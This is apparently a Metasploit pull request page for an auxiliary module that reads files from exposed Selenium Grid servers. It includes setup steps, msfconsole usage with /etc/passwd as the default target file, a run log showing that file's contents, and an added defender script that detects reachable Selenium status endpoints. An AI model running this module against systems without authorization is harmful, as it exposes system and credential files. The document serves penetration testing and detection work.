
Add Selenium file read auxiliary module #19781

Open. 4 commits to merge into base: master

Conversation

Takahiro-Yoko (Contributor)

One of #19753
Chrome RCE PR: #19769
Firefox RCE PR: #19771

Vulnerable Application

If there is an open Selenium WebDriver, a remote attacker can send requests to the victim's browser.
In certain cases this can be used to access the remote file system.

The vulnerability affects:

* all versions of an open Selenium Server (Grid)

This module was successfully tested on:

* selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
* selenium/standalone-chrome:4.27.0 installed with Docker on Ubuntu 24.04
* selenium/standalone-edge:4.27.0 installed with Docker on Ubuntu 24.04

Installation

  1. docker pull selenium/standalone-firefox:3.141.59

  2. docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use auxiliary/gather/selenium_file_read
  4. Do: run rhost=<rhost>
  5. You should get the file content

Options

SCHEME (Required)

This is the scheme to use. Default is file.

FILEPATH (Required)

This is the file to read. Default is /etc/passwd.

BROWSER (Required)

This is the browser to use. Default is firefox.

Scenarios

selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04

msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4448
[*] Running module against 192.168.56.16
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid version 4.x detected and ready.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
seluser:x:1200:1201::/home/seluser:/bin/bash
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin

[*] Auxiliary module execution completed
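As an added defender-side check (not part of this PR or the Metasploit module), the snippet below classifies the status document an exposed Selenium endpoint returns, which is the same signal the module's AutoCheck reports above, so an inventory scan of your own hosts can flag grids reachable from the network. The sample JSON bodies are constructed, modelled on the shape of the Selenium 3 `/wd/hub/status` and Grid 4 `/status` responses; `assess_status` and `fetch_status` are this example's own names.

```python
import json
import urllib.request

# Constructed sample bodies, modelled on Selenium 3 (/wd/hub/status) and
# Selenium Grid 4 (/status) responses; they are not captures from the PR.
SAMPLE_V3 = json.dumps({"value": {"ready": True, "message": "Server is running",
                                  "build": {"version": "3.141.59"}}})
SAMPLE_V4 = json.dumps({"value": {"ready": True, "message": "Selenium Grid ready.",
                                  "nodes": [{"id": "n1", "availability": "UP",
                                             "version": "4.27.0 (revision abc)"}]}})


def assess_status(body: str) -> dict:
    """Return {ready, version, major} for a Selenium status document,
    or {} when the body is not one (wrong service, HTML error page, ...)."""
    try:
        value = json.loads(body).get("value")
    except (ValueError, AttributeError):
        return {}
    if not isinstance(value, dict) or "ready" not in value:
        return {}
    version = None
    if "build" in value:                      # Selenium 3 standalone / hub
        version = value["build"].get("version")
    elif "nodes" in value:                    # Selenium Grid 4: version lives on nodes
        for node in value["nodes"]:
            if node.get("availability") == "UP":
                version = node.get("version", "").split(" ")[0]
                break
    return {"ready": bool(value["ready"]), "version": version,
            "major": version.split(".")[0] if version else None}


def fetch_status(base_url: str, timeout: float = 5.0) -> dict:
    """Probe both status paths a grid answers on; a non-empty result from a
    non-loopback address means the WebDriver API is reachable unauthenticated."""
    for path in ("/status", "/wd/hub/status"):
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=timeout) as r:
                result = assess_status(r.read().decode("utf-8", "replace"))
        except (OSError, ValueError):         # connection refused, HTTP error, bad URL
            continue
        if result:
            result["endpoint"] = path
            return result
    return {}


if __name__ == "__main__":
    print(assess_status(SAMPLE_V3))           # offline demo on the constructed samples
    print(assess_status(SAMPLE_V4))
    print(fetch_status("http://127.0.0.1:4444"))
```

A grid that reports `ready: true` to a caller on another host is the precondition the module above relies on; publishing the container port on loopback only (for example `-p 127.0.0.1:4444:4444` in the `docker run` above) or fronting it with authentication removes that exposure.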

  * add timeout option
  * print session info
  * apply suggestions (rapid7#19769)